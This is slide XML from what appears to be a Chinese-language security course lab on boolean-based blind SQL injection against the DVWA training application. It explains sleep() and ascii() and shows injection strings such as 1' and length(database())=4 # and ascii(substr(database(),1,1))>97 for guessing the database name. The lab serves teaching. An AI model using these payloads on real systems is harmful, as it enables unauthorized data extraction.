              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sleep(n)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>让语句停留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒时间，然后返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，如果执行被打断，返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：返回字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>码值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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966479" y="837929"/>
            <a:ext cx="2925802" cy="474140"/>
            <a:chOff x="4966479" y="837929"/>
            <a:chExt cx="2925802"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966479" y="837929"/>
              <a:ext cx="292580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基于布尔的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盲注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956767" y="1672109"/>
            <a:ext cx="11161240" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对于一个注入点，页面只返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>两种类型页面，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>此时可以利用基于布尔的盲注。布尔盲注就是通过判断语句来猜解，如果判断条件正确则页面显示正常，否则报错，这样一轮一轮猜下去直到猜对，是挺麻烦但是相对简单的盲注方式。</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25119" y="3504248"/>
            <a:ext cx="5086350" cy="285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3177945" y="837929"/>
            <a:ext cx="6502870" cy="474140"/>
            <a:chOff x="3177945" y="837929"/>
            <a:chExt cx="6502870"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177945" y="837929"/>
              <a:ext cx="650287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实验七：</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DVWA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SQL Injection(Blind)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实践</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956767" y="1672109"/>
            <a:ext cx="11161240" cy="1892826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>接下来，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中提供的注入案例，进行手工盲注，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目标是推测出数据库、表和字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>啊？”，通过这种机械的询问，最终获得你想要的数据。</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956767" y="3675887"/>
            <a:ext cx="10932750" cy="1053622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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第一步：判断是否存在注入，注入是字符型还是数字型</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输入</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，显示相应用户存在：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2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28975" y="4761584"/>
            <a:ext cx="7139862" cy="2094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linds(horizontal)">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775" y="820611"/>
            <a:ext cx="11161240" cy="969496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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1=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，单引号为了闭合原来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语句中的第一个单引号，而后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为了闭合后面的单引号。运行后，显示存在：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028775" y="3976365"/>
            <a:ext cx="10932750" cy="581057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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1=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3"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28975" y="1929130"/>
            <a:ext cx="7272808" cy="2119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829" y="4696445"/>
            <a:ext cx="7856642" cy="15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981103" y="6198295"/>
            <a:ext cx="5328592" cy="576248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>字符型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7941543" y="1790107"/>
            <a:ext cx="4464496" cy="1898226"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79769"/>
              <a:gd name="adj2" fmla="val 38804"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>试试？好像也行，原因？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>对数值型字段输入的如果有非字符，有默认处理，只提取前面有效数字使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>所以，也可以利用这一点来判断是否是数值型还是字符型的注入。</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blinds(horizontal)">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775" y="303957"/>
            <a:ext cx="11161240" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>点页面右下角</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>View Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，来查看源代码</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05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56967" y="738220"/>
            <a:ext cx="7488832" cy="6494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blinds(horizontal)">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775" y="736005"/>
            <a:ext cx="11161240" cy="2815322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二步：猜解当前数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>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length(database())=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>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length(database())=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>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length(database())=3 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示不存在；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1' and length(database())=4 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，显示存在：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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84959" y="3797530"/>
            <a:ext cx="799666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693071" y="6057587"/>
            <a:ext cx="5328592" cy="576248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>说明数据库名长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="1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775" y="445031"/>
            <a:ext cx="11161240" cy="506998"/>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思考：如何获得数据库名字？一个个数据库名字尝试？何不采用二分法？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396927" y="6280621"/>
            <a:ext cx="8352928" cy="499624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>重复上述步骤，就可以猜解出完整的数据库名（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1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849698" y="981419"/>
          <a:ext cx="11303370" cy="5334000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11303370"/>
              </a:tblGrid>
              <a:tr h="5189984">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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(),1,1))&gt;97 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的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值大于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>97</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a</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endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRP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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>scii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>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database</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
